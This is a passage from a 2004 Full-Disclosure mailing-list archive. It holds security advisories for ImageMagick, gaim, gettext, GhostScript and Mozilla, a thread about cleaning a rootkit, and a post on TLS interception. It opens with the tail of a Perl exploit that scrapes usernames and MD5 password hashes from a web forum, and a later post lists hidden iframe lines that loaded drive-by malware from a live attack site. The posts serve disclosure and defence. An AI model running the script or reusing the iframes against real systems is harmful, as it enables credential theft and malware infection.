        
        $request = POST ( $searchPage . '?menu=ok' ,
                [
                content => 'abcd',
                search => 'author',
                searchxm => $searchxm,
                searchxm2 => 'topic',
                TimeLimit => '1',
                forumid =>''
                ],
                Referer => $searchPage,
                Connection => 'Keep-Alive',
                User-Agent => 'Mozilla/4.0',
                Host => $webhost
                );
        
        $response = $ua->request( $request );
        
        if ( $response->as_string =~ /HTTP\/1.[01] 200/ )
        {
                print "search Success\n";
                %passwdGet = ();
                htmlOut= split("\n",$response->as_string);
                foreach $v (htmlOut)
                {
                        if ( $v =~ /<script>ShowForum\("\d+","([A-Z0-9]{32,32})",".*?","(.*?)",.*<\/script>/
)
                        {
                                $passwdGet{$1}=$2;
                                #print "\tUsername: $2\n\tMD5 passwd: $1" . "\n";
                        }
                }
                while ( my ( $key, $value ) = each %passwdGet )
                {
                        print "\tusername: $value\n\tMD5 passwd: $key\n";
                }
        }
        else
        {
                print $response->as_string. "\n";
                die "search Failed\n";
        }
        
}

sub loginRegist
{

        $myusername = $_[0];
        $mypassword = $_[1];

        $request = POST ( $registPage,
               [
        username => $myusername,
        password => $mypassword,
        userpass2 => $mypassword,
        usermail => 'frfr.com',
        realname => 'baby',
        userface => 'images/face70.gif',
        birthday => '',
        perlsonal => '',
        sign => '',
        sex => '',
        country => '',
        province => '',
        city => '',
        blood => '',
        belief => '',
        occupation => '',
        marital => '',
        education => '',
        college => '',
        userqq => '',
        icq => '',
        usrehome => '',
        question => '',
        answer => ''
        ],
        Referer => $registPage,
        Connection => 'Keep-Alive',
        User-Agent => 'Mozilla/4.0',
        Host => $webhost,
        );

        $response = $ua->request( $request );
        $cookies->extract_cookies( $response );

        if ( $response->as_string =~ /HTTP\/1.[01] 200/ )
        {
                print "Register Success ($myusername, $mypassword)\n";
        }
        else
        {
                $fRegistFail = 1;
                print "Register Failed ($myusername, $mypassword)\n";
        }
}

sub webLogin
{
        $myusername = $_[0];
        $mypassword = $_[1];

        my $request = POST ( $loginPage,
                [ menu => 'add',
                        username => $myusername,
                        userpass=> $mypassword
                ],
                Referer => $loginPage,
                Connection => 'Keep-Alive',
                User-Agent => 'Mozilla/4.0',
                Host => $webhost
                );
        
        $response = $ua->request( $request );
        $cookies->extract_cookies( $response );
        
        if ( $response->as_string =~ /HTTP\/1.[01] 200/ )
        {
                print "Login Success($myusername, $mypassword)\n";
        }
        else
        {
                $fLoginFail = 1;
                print "Login Failed($myusername, $mypassword)\n"
        }
}

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild

From: Elia Florio (eflorioedmaster.it)
Date: Tue Oct 26 2004 - 18:22:06 CDT

Finally, I clean the compromised box of my friend :))
I've found (following many helpful suggestions of people in FD list)
that a variant of "suckit" rootkit was installed on this machine.
The strange thing is that "rkhunter" and "chkrootkit" don't catch it :((((
in any way and they said that everything is ok.

To found suckit and deactivate it I used this :
http://tsd.student.utwente.nl/skdetect/
It's a code based on suckit source code, but without the malware part.
It can dig into /dev/kmem and explores sys_call_table[];
skdetect was able to found suckit installed.
Another person who was compromised by the "xpire.info" hacker said to me
that
the symptoms were the same and also in his host he found this suckit variant
installed.

>suckit version 'Q' DETECTED
>kernel-part uninstall seems successful.

After reboot everything come back to normal activity.
Thank you to everyone for the answers given to me
(Ron DuFresne, Nick FitzGerald, Kevin and others).

Actually on "xpire.info/fa/?d=get" malware page you can found this exploits
in the wild :

#IFRAME SRC="http://www.sp2fucked.biz/user28/counter.htm" WIDTH=0 BORDER=0
HEIGHT=0></IFRAME#
#iframe src="http://xpire.info/fa/t3.htm" width=1 height=1></iframe#
#iframe src="http://xpire.info/fa/x.htm" width=1 height=1></iframe#
#iframe src="http://xpire.info/fa/proc.htm" width=1 height=1></iframe#
#iframe src="http://xpire.info/fa/runevil.htm" width=1 height=1></iframe#
#iframe src="http://213.159.117.133/dl/adv121.php" width=1
height=1></iframe#
!-- #IFRAME SRC="http://x.full-tgp.net/?fox.com" WIDTH=1 HEIGHT=1></IFRAME#
//-->

There a lot of backdoor/trojan ready-to-install and the bad news is that
most
of this malware are recompiled, so many AV are fooled and don't catch them
(for example Symantec and ClamAV don' recognize many malware
in this site, after a quick test made with www.virustotal.com)

Bye,
EF

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Possibly a stupid question RPC over HTTP

From: Kevin (KKadowgmail.com)
Date: Tue Oct 26 2004 - 23:34:15 CDT

On Tue, 26 Oct 2004 16:47:21 +0100, Airey, John <john.aireyrnib.org.uk> wrote:
> Therefore my point still stands that if someone does possess a mathematical solution to the above, then all bets are off.
> (Whoever it was who disagreed about my statements on encryption, please remember the context of the thread is about SSL security, not one-time keys).

Agreed. Current SSL standards rely on public key encryption methods
which obtain their strength from the difficulty of the factoring
problem.

> Getting back to the original question, you can't discover if someone is sending RPC over https unless you have a solution to the RSA hard problem above. Nor is it a major security issue if someone is using RPC over https either, unless there are flaws in the implementation of SSL or RPC that could be exploited by someone else.

Yes -- however, there are workarounds.
If you control one end point or the other, then you can take steps to
permit examination of the contents of SSL sessions.

Server:
If you control the server, you can of course load the keys into the
sniffer (risky, but not unheard of, see
http://www.radware.com/content/products/ct100/default.asp)) or
terminate the SSL session on a device under your control. (For an
RPC-over-HTTP example, see this document:
http://www.msexchange.org/pages/article_p.asp?id=613)

Client:
If you control the client (say a corporate desktop PC), you have
another option -- you can modify the clients list of trusted CAs, and
force the client to establish the SSL session to your proxy server.
This gives the proxy an opportunity to inspect/log/modify the
cleartext contents of the session. The proxy establishes it's own SSL
session to the remote server normally neither the client or server
would be aware of the MITM.

A freeware implementation of this MITM approach was "Achilles", I have
also seen at least one commercial product offering this functionality
to permit content-scanning of outbound HTTPS browser traffic.

Kevin Kadow

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [USN-7-1] imagemagick vulnerability

From: Martin Pitt (martin.pittcanonical.com)
Date: Tue Oct 26 2004 - 19:52:42 CDT

===========================================================
Ubuntu Security Notice USN-7-1 October 27, 2004
imagemagick vulnerability
CAN-2004-0981
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

The following packages are affected:

libmagick6

The problem can be corrected by upgrading the affected package to
version 5:6.0.2.5-1ubuntu1.1. In general, a standard system upgrade is
sufficient to effect the necessary changes.

Details follow:

A buffer overflow in imagemagick's EXIF parsing routine has been
discovered in imagemagick versions prior to 6.1.0. Trying to query
EXIF information of a malicious image file might result in execution
of arbitrary code with the user's privileges.

Since imagemagick can be used in custom printing systems, this also
might lead to privilege escalation (execute code with the printer
spooler's privileges). However, Ubuntu's standard printing system does
not use imagemagick, thus there is no risk of privilege escalation in
a standard installation.

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.0.2.5-1ubuntu1.1.diff.gz
      Size/MD5: 128252 ec2de08007787f6dceb8048fa381c269
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.0.2.5-1ubuntu1.1.dsc
      Size/MD5: 874 fbd1bde2b883b5e1f6d3c3608baf97f2
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.0.2.5.orig.tar.gz
      Size/MD5: 6700454 207fdb75b6c106007cc483cf15e619ad

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.0.2.5-1ubuntu1.1_amd64.deb
      Size/MD5: 1365882 4a7e2a576a514058945e26a1fbfbaf61
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++6-dev_6.0.2.5-1ubuntu1.1_amd64.deb
      Size/MD5: 226096 8a0cb4adfa863f7917494539793cad37
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++6_6.0.2.5-1ubuntu1.1_amd64.deb
      Size/MD5: 160490 58a31d1a58a09e11135d6864afe07dd6
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick6-dev_6.0.2.5-1ubuntu1.1_amd64.deb
      Size/MD5: 1518994 1e261e47415a33e272c906c69b72be9f
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick6_6.0.2.5-1ubuntu1.1_amd64.deb
      Size/MD5: 1166704 334a3099dce3e9ca8aa5b450452339a9
    http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.0.2.5-1ubuntu1.1_amd64.deb
      Size/MD5: 138348 9e58147cb448c7cb74916f5ff5638c52

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.0.2.5-1ubuntu1.1_i386.deb
      Size/MD5: 1365782 da2ebba8bac45b8fb83033aa7d530c57
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++6-dev_6.0.2.5-1ubuntu1.1_i386.deb
      Size/MD5: 206254 9f762b26048e7ad4dc208834f6d77312
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++6_6.0.2.5-1ubuntu1.1_i386.deb
      Size/MD5: 162540 eb64e055ba51901960dde16af468bbdc
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick6-dev_6.0.2.5-1ubuntu1.1_i386.deb
      Size/MD5: 1425038 e50228507fdfbefcd6176b756040bca4
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick6_6.0.2.5-1ubuntu1.1_i386.deb
      Size/MD5: 1115170 8af906dc32e2dee6a5c171dc0444557f
    http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.0.2.5-1ubuntu1.1_i386.deb
      Size/MD5: 136900 41773f2582175646942845dc28c44011

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.0.2.5-1ubuntu1.1_powerpc.deb
      Size/MD5: 1371144 f0d39986f275d1119268da7affcc34e3
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++6-dev_6.0.2.5-1ubuntu1.1_powerpc.deb
      Size/MD5: 224970 15be8f07f8a697d6665f27d504dba9f1
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++6_6.0.2.5-1ubuntu1.1_powerpc.deb
      Size/MD5: 154292 386fca02c1a14d5e5376c1dde3b3cdbb
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick6-dev_6.0.2.5-1ubuntu1.1_powerpc.deb
      Size/MD5: 1659816 15078f23f6626d1ccb01ad6d2f6f58d6
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick6_6.0.2.5-1ubuntu1.1_powerpc.deb
      Size/MD5: 1151174 0d4aa571620cf6c27f6b5deaf392887c
    http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.0.2.5-1ubuntu1.1_powerpc.deb
      Size/MD5: 135840 4b5d9556339726e1cb277abd0c2692f6

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBfvFaDecnbV4Fd/IRAnqkAJ4laSRS+eVWgLbMIX7FM/3P4fbWSwCeOUn5
XfU4xNi939m1hEmpeBXzu3M=
=FE0z
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [USN-3-1] GhostScript utility script vulnerabilities

From: Martin Pitt (martin.pittcanonical.com)
Date: Tue Oct 26 2004 - 19:42:05 CDT

===========================================================
Ubuntu Security Notice USN-3-1 October 27, 2004
GhostScript utility script vulnerabilities
CAN-2004-0967
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

The following packages are affected:

gs-common

The problem can be corrected by upgrading the affected package to
version 0.3.6ubuntu1.1. In general, a standard system upgrade is
sufficient to effect the necessary changes.

Details follow:

Recently, Trustix Secure Linux discovered some vulnerabilities in the
gs-common package. The utilities "pv.sh" and "ps2epsi" created
temporary files in an insecure way, which allowed a symlink attack to
create or overwrite arbitrary files with the privileges of the user
invoking the program.

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/g/gs-common/gs-common_0.3.6ubuntu1.1.dsc
      Size/MD5: 589 3506426ff7ecd78fea5e254dbf694b35
    http://security.ubuntu.com/ubuntu/pool/main/g/gs-common/gs-common_0.3.6ubuntu1.1.tar.gz
      Size/MD5: 31596 060a50ce728aedeb61d6b17be30d2e5d

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/g/gs-common/gs-common_0.3.6ubuntu1.1_all.deb
      Size/MD5: 45434 8ca2afdfe91cd67777f44f767489a705

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBfu7dDecnbV4Fd/IRAn13AKC8Y+5sLv7WnZLnBQXTi9n4tvdk1gCfXwW8
GIq1xF0hK6UcCrd0usdTUwY=
=5w7E
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [USN-5-1] gettext vulnerabilities

From: Martin Pitt (martin.pittcanonical.com)
Date: Tue Oct 26 2004 - 19:45:55 CDT

===========================================================
Ubuntu Security Notice USN-5-1 October 27, 2004
gettext vulnerabilities
CAN-2004-0966
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

The following packages are affected:

gettext

The problem can be corrected by upgrading the affected package to
version 0.14.1-2ubuntu0.1. In general, a standard system upgrade is
sufficient to effect the necessary changes.

Details follow:

Recently, Trustix Secure Linux discovered some vulnerabilities in the
gettext package. The programs "autopoint" and "gettextize" created
temporary files in an insecure way, which allowed a symlink attack to
create or overwrite arbitrary files with the privileges of the user
invoking the program.

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/g/gettext/gettext_0.14.1-2ubuntu0.1.diff.gz
      Size/MD5: 82347 e172d137c397dc88ca545acebd40b423
    http://security.ubuntu.com/ubuntu/pool/main/g/gettext/gettext_0.14.1-2ubuntu0.1.dsc
      Size/MD5: 789 d273a3e94446d89f603d16ed9587d00b
    http://security.ubuntu.com/ubuntu/pool/main/g/gettext/gettext_0.14.1.orig.tar.gz
      Size/MD5: 6550874 78f4b862510beb2e5d43223dd610e77d

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/g/gettext/gettext-doc_0.14.1-2ubuntu0.1_all.deb
      Size/MD5: 638924 610bd9c00f7971f9d359f7a3902db2e4
    http://security.ubuntu.com/ubuntu/pool/main/g/gettext/gettext-el_0.14.1-2ubuntu0.1_all.deb
      Size/MD5: 45340 cf1fc64a65b38622fdbd29e63b538b69

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/g/gettext/gettext-base_0.14.1-2ubuntu0.1_amd64.deb
      Size/MD5: 92890 581e614d3c390a0b0c4b52752e03cf75
    http://security.ubuntu.com/ubuntu/pool/main/g/gettext/gettext_0.14.1-2ubuntu0.1_amd64.deb
      Size/MD5: 1576278 a3240029c897fcfac68be7eda1f638bb

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/g/gettext/gettext-base_0.14.1-2ubuntu0.1_i386.deb
      Size/MD5: 91066 df2857a4dd7be300743c4e8ec7990997
    http://security.ubuntu.com/ubuntu/pool/main/g/gettext/gettext_0.14.1-2ubuntu0.1_i386.deb
      Size/MD5: 1549186 d16f720d7ef6e031afab70263394c70a

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/g/gettext/gettext-base_0.14.1-2ubuntu0.1_powerpc.deb
      Size/MD5: 94174 9f849ed93f64d80fe669603b581b9df3
    http://security.ubuntu.com/ubuntu/pool/main/g/gettext/gettext_0.14.1-2ubuntu0.1_powerpc.deb
      Size/MD5: 1590102 cba3d457ded8697c018b3e3ac6853f94

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBfu/DDecnbV4Fd/IRAq4+AJ9LTRY8swzj377mKIHs1qct5/gyzgCeOsrr
+38D1w4un36PM4Gb6yEtP5I=
=nFLJ
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [USN-8-1] gaim vulnerabilities

From: Martin Pitt (martin.pittcanonical.com)
Date: Tue Oct 26 2004 - 19:53:22 CDT

===========================================================
Ubuntu Security Notice USN-8-1 October 27, 2004
gaim vulnerabilities
CAN-2004-0891
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

The following packages are affected:

gaim

The problem can be corrected by upgrading the affected package to
version 1:1.0.0-1ubuntu1.1. In general, a standard system upgrade is
sufficient to effect the necessary changes.

Details follow:

A buffer overflow and two remote crashes were recently discovered in
gaim's MSN protocol handler. An attacker could potentially execute
arbitrary code with the user's privileges by crafting and sending a
particular MSN message.

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.0.0-1ubuntu1.1.diff.gz
      Size/MD5: 40716 a1cd244a1d9197c9a4855706f857ede2
    http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.0.0-1ubuntu1.1.dsc
      Size/MD5: 853 dbd5a82e0fa2c33df8fc26d636a2f9f1
    http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.0.0.orig.tar.gz
      Size/MD5: 6985979 7dde686aace751a49dce734fd0cb7ace

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.0.0-1ubuntu1.1_amd64.deb
      Size/MD5: 3443672 0a2a22b071c0256a2d68d20b474fdddc

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.0.0-1ubuntu1.1_i386.deb
      Size/MD5: 3353616 1b825ce8a2cbba5fa2171fa089f71112

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.0.0-1ubuntu1.1_powerpc.deb
      Size/MD5: 3417684 bae36e86bcf49722af6497d55a2de5fc

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBfvGCDecnbV4Fd/IRAr3eAJ9EkWwjOmcrhPFDxRCO+iB6Jj8sLQCgsQsa
xOYdKjDCqSd1EO9f+IfaT8Y=
=Bf36
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [SPAM] Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild

From: Hugo van der Kooij (hvdkooijvanderkooij.org)
Date: Wed Oct 27 2004 - 01:05:44 CDT

On Wed, 27 Oct 2004, Elia Florio wrote:

> There a lot of backdoor/trojan ready-to-install and the bad news is that
> most
> of this malware are recompiled, so many AV are fooled and don't catch them
> (for example Symantec and ClamAV don' recognize many malware
> in this site, after a quick test made with www.virustotal.com)

If you have some time, could you assist the clamav team and send them a
detailed report with your findings and the undetected code bits?

They will appreciate your cooperation in this.

Hugo.

--
        I hate duplicates. Just reply to the relevant mailinglist.
        hvdkooijvanderkooij.org http://hvdkooij.xs4all.nl/
                Don't meddle in the affairs of magicians,
                for they are subtle and quick to anger.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild

From: Elia Florio (eflorioedmaster.it)
Date: Wed Oct 27 2004 - 05:17:08 CDT

>> (for example Symantec and ClamAV don' recognize many malware
>> in this site, after a quick test made with www.virustotal.com)
>
> If you have some time, could you assist the clamav team and send them a
> detailed report with your findings and the undetected code bits?
>
> They will appreciate your cooperation in this.
>
> Hugo.

Of course, I'd like to support Clam team....they're working
hard for a valuable open-source AV and I appreciate this too!
I can send to them my reports (extracted from virustotal.com) and
the un-detect files (exe,dll,class,javascript,html) with
malware/trojan and exploits taken from "xpire.info".

Where do I send this archive? What's the mail address?
Must I use a PGP key or simply a password-protected zip?

EF

________________________________________________
Messaggio inviato da
Edizioni Master Webmail
http://mbox.edmaster.it

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [FLSA-2004:2089] Updated mozilla packages fix security vulnerabilities

From: Dominic Hargreaves (domearth.li)
Date: Wed Oct 27 2004 - 04:17:53 CDT

-----------------------------------------------------------------------
               Fedora Legacy Update Advisory

Synopsis: Updated mozilla resolves security vulnerabilities
Advisory ID: FLSA:2089
Issue date: 2004-10-27
Product: Red Hat Linux
Product: Fedora Core
Keywords: Security
Cross references: https://bugzilla.fedora.us/show_bug.cgi?id=2089
CVE Names: CAN-2003-0564, CAN-2004-0191, CAN-2003-0594,
                   CAN-2004-0722, CAN-2004-0597, CAN-2004-0599,
                   CAN-2004-0757, CAN-2004-0758, CAN-2004-0759,
                   CAN-2004-0760, CAN-2004-0718, CAN-2004-0761,
                   CAN-2004-0762, CAN-2004-0763, CAN-2004-0764,
                   CAN-2004-0765, CAN-2004-0905, CAN-2004-0904,
                   CAN-2004-0903, CAN-2004-0908, CAN-2004-0902
-----------------------------------------------------------------------

-----------------------------------------------------------------------
1. Topic:

Updated mozilla, galeon and epiphany packages that fix multiple
vulnerabilities are now available.

Mozilla is an open-source Web browser, designed for standards
compliance, performance, and portability.

2. Relevant releases/architectures:

Red Hat Linux 7.3 - i386
Red Hat Linux 9 - i386
Fedora Core 1 - i386

3. Problem description:

Note that some of these issues have already been fixed in Redhat 9 and
Fedora Core 1. Please refer to previous advisories for details.

NISCC testing of implementations of the S/MIME protocol uncovered a number
of bugs in NSS versions prior to 3.9. The parsing of unexpected ASN.1
constructs within S/MIME data could cause Mozilla to crash or consume large
amounts of memory. A remote attacker could potentially trigger these bugs
by sending a carefully-crafted S/MIME message to a victim. The Common
Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name
CAN-2003-0564 to this issue.

Andreas Sandblad discovered a cross-site scripting issue that affects
various versions of Mozilla. When linking to a new page it is still
possible to interact with the old page before the new page has been
successfully loaded. Any Javascript events will be invoked in the context
of the new page, making cross-site scripting possible if the different
pages belong to different domains. The Common Vulnerabilities and
Exposures project (cve.mitre.org) has assigned the name CAN-2004-0191 to
this issue.

Flaws have been found in the cookie path handling between a number of Web
browsers and servers. The HTTP cookie standard allows a Web server
supplying a cookie to a client to specify a subset of URLs on the origin
server to which the cookie applies. Web servers such as Apache do not
filter returned cookies and assume that the client will only send back
cookies for requests that fall within the server-supplied subset of URLs.
However, by supplying URLs that use path traversal (/../) and character
encoding, it is possible to fool many browsers into sending a cookie to a
path outside of the originally-specified subset. The Common
Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name
CAN-2003-0594 to this issue.

Zen Parse reported improper input validation to the SOAPParameter object
constructor leading to an integer overflow and controllable heap
corruption. Malicious JavaScript could be written to utilize this flaw and
could allow arbitrary code execution. The Common Vulnerabilities and
Exposures project (cve.mitre.org) has assigned the name CAN-2004-0722 to
this issue.

During a source code audit, Chris Evans discovered a buffer overflow and
integer overflows which affect the libpng code inside Mozilla. An attacker
could create a carefully crafted PNG file in such a way that it would cause
Mozilla to crash or execute arbitrary code when the image was viewed.
(CAN-2004-0597, CAN-2004-0599)

Zen Parse reported a flaw in the POP3 capability. A malicious POP3 server
could send a carefully crafted response that would cause a heap overflow
and potentially allow execution of arbitrary code as the user running
Mozilla. (CAN-2004-0757)

Marcel Boesch found a flaw that allows a CA certificate to be imported with
a DN the same as that of the built-in CA root certificates, which can cause
a denial of service to SSL pages, as the malicious certificate is treated
as invalid. (CAN-2004-0758)

Met - Martin Hassman reported a flaw in Mozilla that could allow malicious
Javascript code to upload local files from a users machine without
requiring confirmation. (CAN-2004-0759)

Mindlock Security reported a flaw in ftp URI handling. By using a NULL
character (%00) in a ftp URI, Mozilla can be confused into opening a
resource as a different MIME type. (CAN-2004-0760)

Mozilla does not properly prevent a frame in one domain from injecting
content into a frame that belongs to another domain, which facilitates
website spoofing and other attacks, also known as the frame injection
vulnerability. (CAN-2004-0718)

Tolga Tarhan reported a flaw that can allow a malicious webpage to use a
redirect sequence to spoof the security lock icon that makes a webpage
appear to be encrypted. (CAN-2004-0761)

Jesse Ruderman reported a security issue that affects a number of browsers
including Mozilla that could allow malicious websites to install arbitrary
extensions by using interactive events to manipulate the XPInstall Security
dialog box. (CAN-2004-0762)

Emmanouel Kellinis discovered a caching flaw in Mozilla which allows
malicious websites to spoof certificates of trusted websites via
redirects and Javascript that uses the "onunload" method. (CAN-2004-0763)

Mozilla allowed malicious websites to hijack the user interface via the
"chrome" flag and XML User Interface Language (XUL) files. (CAN-2004-0764)

The cert_TestHostName function in Mozilla only checks the hostname portion
of a certificate when the hostname portion of the URI is not a fully
qualified domain name (FQDN). This flaw could be used for spoofing if an
attacker had control of machines on a default DNS search path. (CAN-2004-0765)
 
Jesse Ruderman discovered a cross-domain scripting bug in Mozilla. If
a user is tricked into dragging a javascript link into another frame or
page, it becomes possible for an attacker to steal or modify sensitive
information from that site. Additionally, if a user is tricked into
dragging two links in sequence to another window (not frame), it is
possible for the attacker to execute arbitrary commands. The Common
Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name
CAN-2004-0905 to this issue.

Gael Delalleau discovered an integer overflow which affects the BMP
handling code inside Mozilla. An attacker could create a carefully crafted
BMP file in such a way that it would cause Mozilla to crash or execute
arbitrary code when the image is viewed. The Common Vulnerabilities and
Exposures project (cve.mitre.org) has assigned the name CAN-2004-0904 to
this issue.

Georgi Guninski discovered a stack-based buffer overflow in the vCard
display routines. An attacker could create a carefully crafted vCard file
in such a way that it would cause Mozilla to crash or execute arbitrary
code when viewed. The Common Vulnerabilities and Exposures project
(cve.mitre.org) has assigned the name CAN-2004-0903 to this issue.

Wladimir Palant discovered a flaw in the way javascript interacts with
the clipboard. It is possible that an attacker could use malicious
javascript code to steal sensitive data which has been copied into the
clipboard. The Common Vulnerabilities and Exposures project
(cve.mitre.org) has assigned the name CAN-2004-0908 to this issue.

Georgi Guninski discovered a heap based buffer overflow in the "Send
Page" feature. It is possible that an attacker could construct a link in
such a way that a user attempting to forward it could result in a crash or
arbitrary code execution. The Common Vulnerabilities and Exposures project
(cve.mitre.org) has assigned the name CAN-2004-0902 to this issue.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade. Only those
RPMs which are currently installed will be updated. Those RPMs which are
not installed but included in the list will not be updated. Note that you
can also use wildcards (*.rpm) if your current directory *only* contains
the desired RPMs.

Please note that this update is also available via yum and apt. Many
people find this an easier way to apply updates. To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the appropriate
RPMs being upgraded on your system. This assumes that you have yum or
apt-get configured for obtaining Fedora Legacy content. Please visit
http://www.fedoralegacy.org/docs/ for directions on how to configure yum
and apt-get.

5. Bug IDs fixed:

http://bugzilla.fedora.us - 1532 - Mozilla 1.4.2 fixes various vulns
http://bugzilla.fedora.us - 1834 - Mozilla < 1.4.3 multiple flaws
http://bugzilla.fedora.us - 2089 - Mozilla < 1.7.3 multiple flaws

6. RPMs required:

Red Hat Linux 7.3:

SRPM:
http://download.fedoralegacy.org/redhat/7.3/updates/SRPMS/mozilla-1.4.3-0.7.1.legacy.src.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/SRPMS/galeon-1.2.13-0.7.1.legacy.src.rpm

i386:
http://download.fedoralegacy.org/redhat/7.3/updates/i386/mozilla-1.4.3-0.7.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/mozilla-chat-1.4.3-0.7.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/mozilla-devel-1.4.3-0.7.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/mozilla-dom-inspector-1.4.3-0.7.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/mozilla-js-debugger-1.4.3-0.7.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/mozilla-mail-1.4.3-0.7.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/mozilla-nspr-1.4.3-0.7.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/mozilla-nspr-devel-1.4.3-0.7.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/mozilla-nss-1.4.3-0.7.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/mozilla-nss-devel-1.4.3-0.7.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/galeon-1.2.13-0.7.1.legacy.i386.rpm

Red Hat Linux 9:

SRPM:
http://download.fedoralegacy.org/redhat/9/updates/SRPMS/mozilla-1.4.3-0.9.1.legacy.src.rpm
http://download.fedoralegacy.org/redhat/9/updates/SRPMS/galeon-1.2.13-0.9.2.legacy.src.rpm

i386:
http://download.fedoralegacy.org/redhat/9/updates/i386/mozilla-1.4.3-0.9.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/mozilla-chat-1.4.3-0.9.1.legacy.i386.rpm
